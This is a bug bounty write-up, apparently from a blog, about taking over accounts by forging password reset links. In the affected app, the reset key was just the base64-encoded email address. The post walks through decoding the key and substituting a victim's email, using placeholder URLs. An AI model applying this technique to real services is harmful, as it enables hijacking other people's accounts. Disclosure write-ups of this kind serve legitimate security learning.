One Easy and Funny Account Takeover π
Just replaced my email ID with the victim's email ID and Boom !!
Hello Folks, in this article I will explain one of my account takeover reports.
Let's get Started !! π
I was hunting on the same program where I found β20K INR β IDOR to Account Takeover π₯π₯β
This is one of my favorite P1 bugs that I found till now, and the funny part of this exploit is very easy.
Normally, I was testing the password reset functionality, firstly I sent a password reset link to my email ID to see what is going on in the backend.
I copied the link which is sent to my email ID, which looks like this:
https://vulnapp.com/api/set_password?key=eitfgfdhfjdjjdfjd
Here Iβm a little bit curious about the parameter key=<token-value>
I realized that this value looks like Base64. Then I send this request to the decoder of my Burp and converted it to plain text.
Great !!
It is nothing but an email ID that I used to reset the password.
Behind the application, base64 encoded email ID β plain text email ID
User can see this β https://vulnapp.com/api/set_password?key=eitfgfdhfjdjjdfjd
Behind the seen β https://vulnapp.com/api/set_password?key=attacher-id@gmail.com
OMGβ¦β¦..
Immediately I created another account with a different email ID and this time I replaced the base64 string of the victim email ID:
https://vulnapp.com/api/set_password?key=victim-id@gmail.com
converted this to base64 looks like:
https://vulnapp.com/api/set_password?key=hfagfdghitfgfdh
Boom π₯π₯
This is literally unbelievable, I have never seen this kind of easy and funny bug.
I did it !!
I took over the victim's whole account, only I need is his/her email ID.
This is really cool, account takeover that I found within a few minutes.
You may not find this kind of silly bug in your targets, but try to analyze and understand what is going on in the backend. Definitely, it helps to find the various logical bugs.
And finally, I received the following response from the team.
Reported on: Feb 3rd, 2022
Fixed on: Feb 7th, 2022
Rewarded: Feb 21st, 2022
Thatβs it for this write-up.
Happy Hacking π₯π₯
Thanks for reading.
Please follow me for more writeups.
β
